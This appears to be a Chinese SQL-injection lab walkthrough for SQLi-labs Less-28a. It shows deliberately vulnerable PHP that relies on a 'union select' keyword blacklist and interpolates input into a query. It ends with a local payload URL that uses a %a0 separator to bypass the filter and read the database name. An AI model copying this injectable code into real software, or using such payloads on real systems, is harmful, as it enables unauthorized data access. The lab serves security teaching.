关键代码
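/**
 * Keyword blacklist applied to the `id` request parameter in this lesson.
 *
 * The only active rule deletes "union", one or more whitespace characters and
 * "select", matched case-insensitively. The remaining rules are left commented
 * out, as in the original listing.
 *
 * NOTE(review): a keyword blacklist is not a defence against SQL injection.
 * With PCRE's default character tables \s covers ASCII whitespace only, which
 * is why the %a0 separator in the request shown on this page is not removed.
 *
 * @param string $id Raw value taken from the request.
 * @return string|null Value with every match removed; null if PCRE reports an error.
 */
function blacklist($id)
{
    // Disabled rules, kept for comparison with the previous lesson.
    //$id= preg_replace('/[/*]/',"", $id);      //Strip out /*
    //$id= preg_replace('/[--]/',"", $id);      //Strip out --.
    //$id= preg_replace('/[#]/',"", $id);       //Strip out #.
    //$id= preg_replace('/[ +]/',"", $id);      //Strip out spaces.
    //$id= preg_replace('/select/m',"", $id);   //Strip out select.
    //$id= preg_replace('/[ +]/',"", $id);      //Strip out spaces.

    // The published listing read '/unions+select/i': the backslash of \s was lost,
    // so the pattern could never match "union select". Restored here.
    $id = preg_replace('/union\s+select/i', "", $id);

    return $id;
}

// Untrusted input: read straight from the query string. The fallback avoids an
// undefined-index warning when the parameter is absent.
$id = $_GET['id'] ?? '';
$id = blacklist($id);

// NOTE(review): $id is still attacker-controlled at this point and is interpolated
// into the statement text, so the query stays injectable whatever blacklist()
// removed. The fix is a prepared statement with a bound parameter (PDO or mysqli)
// plus validating the id as an integer; the execution code is not part of this
// excerpt, so the statement is left as published.
$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// Error output is disabled in this lesson. The mysql_* API referenced here was
// removed in PHP 7.
//print_r(mysql_error());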
本关与 Less-28 基本一致,只是过滤条件更少:只保留了对 union + 空白字符 + select(不区分大小写)的替换,其余过滤规则都被注释掉了。
http://127.0.0.1/sql/Less-28a/?id=100')union%a0select 1,database(),3||('1